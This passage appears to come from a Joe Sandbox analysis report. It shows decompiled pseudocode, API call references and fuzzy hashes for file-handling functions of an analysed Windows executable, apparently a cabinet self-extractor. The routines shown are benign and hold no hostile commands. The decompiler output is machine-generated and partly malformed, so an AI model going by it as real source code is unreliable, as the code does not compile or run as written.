                                                                                                                                                                                                                                                • Opcode ID: 966a6e46c79190184c71c2d545695713389e44784a764aa33aba7531f3b0ced9
                                                                                                                                                                                                                                                • Instruction ID: fe3d37740bcdcac56faa0d9d4563018623c09fc4329b53c415ed2e645b699893
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 966a6e46c79190184c71c2d545695713389e44784a764aa33aba7531f3b0ced9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F4164B62002018BCB24AFB8CDD46F573A5EB65340F048668EAC6976C1DBF1DE8AC750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x108d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x108d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                                0x00104c40
                                                                                                                                                                                                                                                0x00104c4a
                                                                                                                                                                                                                                                0x00104c8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104c70
                                                                                                                                                                                                                                                0x00104c70
                                                                                                                                                                                                                                                0x00104c7e
                                                                                                                                                                                                                                                0x00104c86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104c8a

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00104C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00104C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00104C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: a88e5b59d042b1af540e3a857a4704c1830b13c797600b11b48a32dfbb0a2f42
                                                                                                                                                                                                                                                • Instruction ID: c03a08f227622aeccc752ca3a74a9bb9ef43a5fe429f9841a233440998fac607
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a88e5b59d042b1af540e3a857a4704c1830b13c797600b11b48a32dfbb0a2f42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F096B260120C6FFB14DFB4CD88DBB77ACEB04250744452EB696C10D0EBB0D954C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0010487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0010490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                                0x00104880
                                                                                                                                                                                                                                                0x0010488c
                                                                                                                                                                                                                                                0x00104894
                                                                                                                                                                                                                                                0x001048a0
                                                                                                                                                                                                                                                0x001048c9
                                                                                                                                                                                                                                                0x001048ce
                                                                                                                                                                                                                                                0x001048a2
                                                                                                                                                                                                                                                0x001048a8
                                                                                                                                                                                                                                                0x001048b7
                                                                                                                                                                                                                                                0x001048bc
                                                                                                                                                                                                                                                0x001048aa
                                                                                                                                                                                                                                                0x001048ac
                                                                                                                                                                                                                                                0x001048ac
                                                                                                                                                                                                                                                0x001048a8
                                                                                                                                                                                                                                                0x001048de
                                                                                                                                                                                                                                                0x001048e7
                                                                                                                                                                                                                                                0x0010490b
                                                                                                                                                                                                                                                0x001048ee
                                                                                                                                                                                                                                                0x001048f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104902

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00104A23,?,00104F67,*MEMCAB,00008000,00000180), ref: 001048DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00104F67,*MEMCAB,00008000,00000180), ref: 00104902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: f10e99827f12bef0c60374fd2cf9a463a5484bacef7e0f55c8e689853fa378db
                                                                                                                                                                                                                                                • Instruction ID: e5db84e7165311f14a038c413f5bacabedff00986deebcfdbd8269cd5916e8fa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f10e99827f12bef0c60374fd2cf9a463a5484bacef7e0f55c8e689853fa378db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 200124F3E126702AF22450698C88FB7551C8B9A634F1B4735BEEAA62D2D6A44C0482E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00104AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x10858c; // 0x270
				_t9 = E00103680(_t20);
				if( *0x1091d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x108d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x109400; // 0x81600
							_t15 = _t14 + _t25;
							 *0x109400 = _t15;
							if( *0x108184 != 0) {
								_t21 =  *0x108584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                                0x00104ad5
                                                                                                                                                                                                                                                0x00104adb
                                                                                                                                                                                                                                                0x00104ae7
                                                                                                                                                                                                                                                0x00104aee
                                                                                                                                                                                                                                                0x00104b05
                                                                                                                                                                                                                                                0x00104b0d
                                                                                                                                                                                                                                                0x00104b14
                                                                                                                                                                                                                                                0x00104b1a
                                                                                                                                                                                                                                                0x00104b1c
                                                                                                                                                                                                                                                0x00104b21
                                                                                                                                                                                                                                                0x00104b2a
                                                                                                                                                                                                                                                0x00104b2f
                                                                                                                                                                                                                                                0x00104b31
                                                                                                                                                                                                                                                0x00104b39
                                                                                                                                                                                                                                                0x00104b54
                                                                                                                                                                                                                                                0x00104b54
                                                                                                                                                                                                                                                0x00104b39
                                                                                                                                                                                                                                                0x00104b2f
                                                                                                                                                                                                                                                0x00104b0f
                                                                                                                                                                                                                                                0x00104b0f
                                                                                                                                                                                                                                                0x00104b0f
                                                                                                                                                                                                                                                0x00104b5e
                                                                                                                                                                                                                                                0x00104ae9
                                                                                                                                                                                                                                                0x00104aed
                                                                                                                                                                                                                                                0x00104aed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0010369F
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036B2
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00104B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 9c6bd55ecfaaafb8ee66ce5e2b1eb6b526238fd666670d42812c3c9990c21592
                                                                                                                                                                                                                                                • Instruction ID: 0a989d3eda51cabaf55f65ccb389764eac389d5b1b52c1d420e97754da977e2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6bd55ecfaaafb8ee66ce5e2b1eb6b526238fd666670d42812c3c9990c21592
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F101F171200205ABDB148F68DC55BA27759FB44725F048325FAF9AB5F1CBF0C891CB80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0010658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x108b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x108b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E001016B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                                0x00106592
                                                                                                                                                                                                                                                0x00106594
                                                                                                                                                                                                                                                0x00106596
                                                                                                                                                                                                                                                0x00106598
                                                                                                                                                                                                                                                0x00106598
                                                                                                                                                                                                                                                0x0010659b
                                                                                                                                                                                                                                                0x0010659b
                                                                                                                                                                                                                                                0x0010659d
                                                                                                                                                                                                                                                0x0010659e
                                                                                                                                                                                                                                                0x001065a2
                                                                                                                                                                                                                                                0x001065a4
                                                                                                                                                                                                                                                0x001065a9
                                                                                                                                                                                                                                                0x001065b2
                                                                                                                                                                                                                                                0x001065b6
                                                                                                                                                                                                                                                0x001065ba
                                                                                                                                                                                                                                                0x001065c3
                                                                                                                                                                                                                                                0x001065c5
                                                                                                                                                                                                                                                0x001065c8
                                                                                                                                                                                                                                                0x001065c8
                                                                                                                                                                                                                                                0x001065c3
                                                                                                                                                                                                                                                0x001065c9
                                                                                                                                                                                                                                                0x001065cc
                                                                                                                                                                                                                                                0x001065d2
                                                                                                                                                                                                                                                0x001065d1
                                                                                                                                                                                                                                                0x001065d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001065dc
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00108B3E,00108B3F,00000001,00108B3E,-00000003,?,001060EC,00101140,?), ref: 001065BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 721013e10aeef22d636b882b2fb3dd5a98924b42c2323dffd5abd4c77aab8d44
                                                                                                                                                                                                                                                • Instruction ID: f8fdb499cb9090786018a1ab5e53cac7c2e0202d6e219ce176250cec7adbf97e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 721013e10aeef22d636b882b2fb3dd5a98924b42c2323dffd5abd4c77aab8d44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2F04C321042509FD335591D9C84B76BFDE9B963A0F29026EE8DAC3389CBE58D5683B0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0010621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0010597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E001044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x109124 = E00106285();
					_t9 = 0;
				}
				return E00106CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                                0x00106229
                                                                                                                                                                                                                                                0x00106230
                                                                                                                                                                                                                                                0x00106247
                                                                                                                                                                                                                                                0x0010626a
                                                                                                                                                                                                                                                0x00106272
                                                                                                                                                                                                                                                0x00106249
                                                                                                                                                                                                                                                0x00106255
                                                                                                                                                                                                                                                0x0010625f
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106284

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0010623F
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: 7c3e2d4f10b353a035b4f687bc4975b3303d68bf9881c9fae1ac2999d91a5276
                                                                                                                                                                                                                                                • Instruction ID: a1047c0d12382c55c73d10a2797d316cfcad70df421bcfb9e04f9d4c7e392e1e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c3e2d4f10b353a035b4f687bc4975b3303d68bf9881c9fae1ac2999d91a5276
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F089B07042086BE750EB749D06FBE77ACDB54700F400469BAC5D61D1DFF49D958654
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x108d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x108d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x108d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x108d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x108d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x108d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x108d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                                0x00104b66
                                                                                                                                                                                                                                                0x00104b74
                                                                                                                                                                                                                                                0x00104b98
                                                                                                                                                                                                                                                0x00104ba0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104bac
                                                                                                                                                                                                                                                0x00104ba4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104ba4
                                                                                                                                                                                                                                                0x00104b78
                                                                                                                                                                                                                                                0x00104b7e
                                                                                                                                                                                                                                                0x00104b84
                                                                                                                                                                                                                                                0x00104b8a
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00104FA1,00000000), ref: 00104B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 7fdb12b819bb63f41c64c9d93e75d09c0d5672c0af3b4f1d4e675034b58d296f
                                                                                                                                                                                                                                                • Instruction ID: 32fbcabfab6df4a1bd217b3cc2e6d09af0d50c2d8960f2accc7e728d52a822ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fdb12b819bb63f41c64c9d93e75d09c0d5672c0af3b4f1d4e675034b58d296f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4F01271508B089FC7719FB9CC40652BBE4BB993653100B2E95EED21D4EBF0A861DB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001066AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001066AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                                0x001066b1
                                                                                                                                                                                                                                                0x001066ba
                                                                                                                                                                                                                                                0x001066c7
                                                                                                                                                                                                                                                0x001066bc
                                                                                                                                                                                                                                                0x001066be
                                                                                                                                                                                                                                                0x001066be

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00104777,?,00104E38,?), ref: 001066B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 670795cfdf5bbaf4e93a00e4ab57ccc0fa96b841accf776e8c7f2a009dba973c
                                                                                                                                                                                                                                                • Instruction ID: f3be086b5e94d5d6f4670691f74825e2a5a69eda1da3f4eab5d8a6e3b41e334a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 670795cfdf5bbaf4e93a00e4ab57ccc0fa96b841accf776e8c7f2a009dba973c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFB0927662254442AA2006316C2955A2841BBC123A7E42B90F072C05E4CBBEC896D004
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00104caa
                                                                                                                                                                                                                                                0x00104cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00104CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: a92f79489f9e227b35420181303d4c47a5815fee715862eb02836c9c19cadbaf
                                                                                                                                                                                                                                                • Instruction ID: 5f4f194a7177ba4a962a12a0efb21473a0c8172ba8e58352f70b77963e8f98b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a92f79489f9e227b35420181303d4c47a5815fee715862eb02836c9c19cadbaf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2B0123204430CB7CF001FC2EC09F853F1DEBC4761F540000F64C45450CAB294508696
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00104cc8
                                                                                                                                                                                                                                                0x00104ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
